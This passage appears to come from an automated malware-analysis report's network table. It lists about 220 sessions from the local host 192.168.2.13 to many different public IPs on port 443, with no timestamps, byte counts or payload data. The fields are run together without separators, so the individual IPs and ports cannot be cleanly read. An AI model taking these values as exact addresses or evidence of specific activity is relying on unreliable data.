                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22768192.168.2.1359204121.80.99.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22769192.168.2.1349212185.192.248.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22770192.168.2.136045852.215.157.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22771192.168.2.133738475.193.145.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22772192.168.2.1339882118.185.95.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22773192.168.2.1358358146.209.103.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22774192.168.2.1357846158.161.243.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22775192.168.2.135977640.241.5.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22776192.168.2.135172452.16.149.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22777192.168.2.133297252.216.140.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22778192.168.2.1353662204.102.133.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22779192.168.2.1337368222.101.248.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22780192.168.2.1342146194.218.22.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22781192.168.2.1343106109.116.38.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22782192.168.2.1360124163.127.185.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22783192.168.2.135768832.186.250.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22784192.168.2.1353936216.192.124.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22785192.168.2.13464744.17.106.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22786192.168.2.1351848156.120.119.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22787192.168.2.1347484178.237.57.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22788192.168.2.1350564223.163.168.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22789192.168.2.1357332198.105.78.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22790192.168.2.1353388163.78.41.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22791192.168.2.1345242203.148.104.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22792192.168.2.1333550106.43.193.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22793192.168.2.1356424168.133.229.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22794192.168.2.1341870117.24.163.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22795192.168.2.135181870.120.46.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22796192.168.2.134116413.34.59.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22797192.168.2.134066868.63.39.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22798192.168.2.1338236206.186.133.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22799192.168.2.1347112131.169.152.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22800192.168.2.133762866.81.95.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22801192.168.2.13485324.100.98.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22802192.168.2.1336112211.71.20.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22803192.168.2.133877240.188.76.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22804192.168.2.1353684147.241.104.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22805192.168.2.1350088206.220.158.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22806192.168.2.1353110168.89.43.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22807192.168.2.1356418103.16.220.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22808192.168.2.1334876171.252.108.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22809192.168.2.1336228184.82.245.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22810192.168.2.1350428116.206.49.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22811192.168.2.134047047.246.59.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22812192.168.2.134655020.69.131.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22813192.168.2.135380667.161.222.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22814192.168.2.135250851.200.117.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22815192.168.2.1336188186.183.35.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22816192.168.2.135519295.149.21.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22817192.168.2.1359870200.100.85.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22818192.168.2.1353222177.136.198.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22819192.168.2.1356750173.1.41.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22820192.168.2.1354844153.129.225.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22821192.168.2.133700627.200.236.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22822192.168.2.135580245.152.118.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22823192.168.2.1346966171.15.115.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22824192.168.2.1344902145.169.119.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22825192.168.2.1358144208.203.134.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22826192.168.2.136048427.200.4.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22827192.168.2.1333936163.224.236.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22828192.168.2.1335314188.35.165.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22829192.168.2.133736435.186.202.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22830192.168.2.1342354162.175.110.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22831192.168.2.134043644.83.135.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22832192.168.2.135440836.134.54.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22833192.168.2.1341998222.109.93.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22834192.168.2.135060812.110.18.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22835192.168.2.1338396153.62.12.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22836192.168.2.133897064.141.62.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22837192.168.2.133807462.88.52.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22838192.168.2.1352536217.1.140.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22839192.168.2.1349276172.15.47.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22840192.168.2.134323078.32.226.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22841192.168.2.1352850102.146.130.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22842192.168.2.1344644206.162.249.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22843192.168.2.1335032106.160.40.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22844192.168.2.134803080.160.6.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22845192.168.2.1353878186.243.11.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22846192.168.2.133842417.230.23.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22847192.168.2.135986298.28.217.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22848192.168.2.134258613.185.69.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22849192.168.2.1351316148.81.59.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22850192.168.2.135912674.92.22.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22851192.168.2.135597871.132.49.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22852192.168.2.133591451.122.86.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22853192.168.2.1356422188.153.154.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22854192.168.2.13513481.165.36.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22855192.168.2.1357818198.67.61.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22856192.168.2.13350065.183.209.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22857192.168.2.1333892195.186.66.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22858192.168.2.1333192142.5.168.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22859192.168.2.1340644144.101.144.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22860192.168.2.1349934129.149.114.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22861192.168.2.1352828118.56.223.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22862192.168.2.1335968161.126.19.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22863192.168.2.133566031.211.195.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22864192.168.2.133397488.235.148.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22865192.168.2.133552436.92.245.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22866192.168.2.1357566220.34.58.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22867192.168.2.1341212198.187.0.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22868192.168.2.133912483.134.121.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22869192.168.2.133772883.28.228.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22870192.168.2.133841277.97.69.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22871192.168.2.134675478.64.250.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22872192.168.2.135444098.249.12.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22873192.168.2.1356336148.213.179.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22874192.168.2.1354392161.114.147.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22875192.168.2.133999667.30.135.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22876192.168.2.135458491.64.153.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22877192.168.2.135985024.72.87.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22878192.168.2.1360134146.252.9.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22879192.168.2.135297898.113.168.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22880192.168.2.1345668147.102.223.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22881192.168.2.1333902182.73.239.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22882192.168.2.134217054.204.182.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22883192.168.2.133456680.176.123.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22884192.168.2.134403483.148.178.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22885192.168.2.1337616175.216.29.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22886192.168.2.1335364110.120.134.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22887192.168.2.134886043.68.137.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22888192.168.2.1358288156.153.123.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22889192.168.2.1348644208.79.237.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22890192.168.2.134243036.129.213.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22891192.168.2.135794474.243.134.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22892192.168.2.1355534129.170.169.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22893192.168.2.133775071.14.193.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22894192.168.2.135011675.187.25.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22895192.168.2.1353538154.37.81.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22896192.168.2.1333486173.22.188.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22897192.168.2.1351508174.4.239.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22898192.168.2.1355212178.62.140.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22899192.168.2.134398689.207.56.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22900192.168.2.1337956180.33.56.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22901192.168.2.1340894201.229.12.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22902192.168.2.1341758153.143.128.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22903192.168.2.1357206117.1.155.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22904192.168.2.135020245.126.26.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22905192.168.2.1339182167.85.46.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22906192.168.2.133412279.117.167.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22907192.168.2.134948292.222.52.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22908192.168.2.1338662102.196.5.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22909192.168.2.133300840.8.224.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22910192.168.2.1341778191.119.43.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22911192.168.2.1335890119.162.95.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22912192.168.2.133978881.21.28.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22913192.168.2.1354890145.22.20.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22914192.168.2.133490057.192.24.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22915192.168.2.1355978121.32.248.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22916192.168.2.1351330177.221.254.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22917192.168.2.1334750104.64.202.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22918192.168.2.134477042.239.197.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22919192.168.2.134695061.128.42.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22920192.168.2.1359322195.226.240.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22921192.168.2.1359090117.11.156.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22922192.168.2.1341512148.47.224.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22923192.168.2.135665045.21.226.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22924192.168.2.135673439.148.28.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22925192.168.2.1355684187.163.76.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22926192.168.2.1337340166.12.154.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22927192.168.2.1339572210.58.4.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22928192.168.2.1341032197.230.164.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22929192.168.2.1344454149.141.230.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22930192.168.2.1335228186.75.56.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22931192.168.2.1341110202.7.59.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22932192.168.2.1332810107.115.116.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22933192.168.2.1354878183.11.116.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22934192.168.2.1353172173.55.85.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22935192.168.2.1355800116.175.216.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22936192.168.2.134592876.156.254.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22937192.168.2.1335948157.245.105.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22938192.168.2.133750250.35.133.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22939192.168.2.13372125.11.134.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22940192.168.2.133608497.1.250.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22941192.168.2.134751686.164.89.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22942192.168.2.134104420.218.0.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22943192.168.2.134659450.137.82.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22944192.168.2.1343860149.95.235.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22945192.168.2.134922842.139.10.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22946192.168.2.13429204.78.133.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22947192.168.2.1352570125.210.57.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22948192.168.2.1336286118.233.81.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22949192.168.2.135066057.131.221.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22950192.168.2.135347083.97.244.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22951192.168.2.133352285.154.82.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22952192.168.2.1339464195.116.169.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22953192.168.2.1341590122.218.218.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22954192.168.2.136061237.186.137.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22955192.168.2.13583049.59.108.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22956192.168.2.1355014108.118.138.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22957192.168.2.133659450.175.117.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22958192.168.2.1356664151.207.221.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22959192.168.2.1357668154.76.203.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22960192.168.2.1339184143.252.73.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22961192.168.2.1338152185.147.180.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22962192.168.2.134369694.78.239.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22963192.168.2.1351448172.41.155.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22964192.168.2.134466289.27.85.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22965192.168.2.134661482.104.22.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22966192.168.2.1354966173.95.234.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22967192.168.2.1343294169.157.76.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22968192.168.2.1334460193.116.197.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22969192.168.2.1341676188.127.189.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22970192.168.2.1360384133.161.249.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22971192.168.2.1343866166.122.48.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22972192.168.2.135347434.51.95.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22973192.168.2.1338188156.239.173.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22974192.168.2.134338672.33.215.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22975192.168.2.135402054.77.191.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22976192.168.2.134352440.79.22.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22977192.168.2.1353968178.75.91.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22978192.168.2.134030250.56.187.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22979192.168.2.134599036.241.136.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22980192.168.2.1352300191.47.131.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22981192.168.2.134248470.57.250.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22982192.168.2.134488425.36.69.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22983192.168.2.1336050110.173.232.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22984192.168.2.134631682.62.159.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22985192.168.2.1359492189.151.13.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22986192.168.2.1355228124.194.72.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22987192.168.2.134719871.147.213.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22988192.168.2.1349544216.1.235.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    22989192.168.2.1345770142.88.246.79443
